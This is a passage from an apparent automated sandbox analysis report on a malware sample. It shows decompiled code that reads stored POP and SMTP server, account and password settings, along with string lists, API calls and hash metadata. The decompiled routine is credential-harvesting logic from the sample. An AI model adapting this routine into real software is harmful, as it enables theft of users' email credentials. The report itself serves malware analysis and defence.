                  					_v16 = E00404BEE(_t37,  *_t72, L"PopServer");
                  					_v40 = E00404BA7(_t81,  *_t72, L"PopPort");
                  					_t40 = E00404BEE(_t37,  *_t72, L"PopAccount");
                  					_v8 = _v8 & 0x00000000;
                  					_v20 = _t40;
                  					_v24 = E00404C4E(_t71,  *_t72, L"PopPassword",  &_v8);
                  					_v28 = E00404BEE(_t67,  *_t72, L"SmtpServer");
                  					_v44 = E00404BA7(_t81,  *_t72, L"SmtpPort");
                  					_t45 = E00404BEE(_t67,  *_t72, L"SmtpAccount");
                  					_v12 = _v12 & 0x00000000;
                  					_v32 = _t45;
                  					_t47 = E00404C4E(_t71,  *_t72, L"SmtpPassword",  &_v12);
                  					_t77 = _t75 + 0x50;
                  					_v36 = _t47;
                  					if(_v8 != 0 || _v12 != 0) {
                  						E00405872( *0x49f934, _t71, 1, 0);
                  						E00405872( *0x49f934, _t67, 1, 0);
                  						_t74 = _v16;
                  						E00405872( *0x49f934, _v16, 1, 0);
                  						E00405781( *0x49f934, _v40);
                  						E00405872( *0x49f934, _v20, 1, 0);
                  						_push(_v8);
                  						E00405762(_v16,  *0x49f934, _v24);
                  						E00405872( *0x49f934, _v28, 1, 0);
                  						E00405781( *0x49f934, _v44);
                  						E00405872( *0x49f934, _v32, 1, 0);
                  						_push(_v12);
                  						E00405762(_t74,  *0x49f934, _v36);
                  						_t77 = _t77 + 0x88;
                  					} else {
                  						_t74 = _v16;
                  					}
                  					E0040471C(_t71);
                  					E0040471C(_t67);
                  					E0040471C(_t74);
                  					E0040471C(_v20);
                  					E0040471C(_v24);
                  					E0040471C(_v28);
                  					E0040471C(_v32);
                  					E0040471C(_v36);
                  				}
                  				return 1;
                  			}






















                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.602862765.00000000004A0000.00000040.00000400.00020000.00000000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_kVijllv0Yl.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                  • API String ID: 0-2111798378
                  • Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                  • Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
                  • Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                  • Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • CoInitialize.OLE32(00000000), ref: 0040438F
                  • CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
                  • VariantInit.OLEAUT32(?), ref: 004043C4
                  • SysAllocString.OLEAUT32(?), ref: 004043CD
                  • VariantInit.OLEAUT32(?), ref: 00404414
                  • SysAllocString.OLEAUT32(?), ref: 00404419
                  • VariantInit.OLEAUT32(?), ref: 00404431
                  Memory Dump Source
                  • Source File: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.602862765.00000000004A0000.00000040.00000400.00020000.00000000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_kVijllv0Yl.jbxd
                  Yara matches
                  Similarity
                  • API ID: InitVariant$AllocString$CreateInitializeInstance
                  • String ID:
                  • API String ID: 1312198159-0
                  • Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                  • Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
                  • Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                  • Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94
                  Uniqueness

                  Uniqueness Score: -1.00%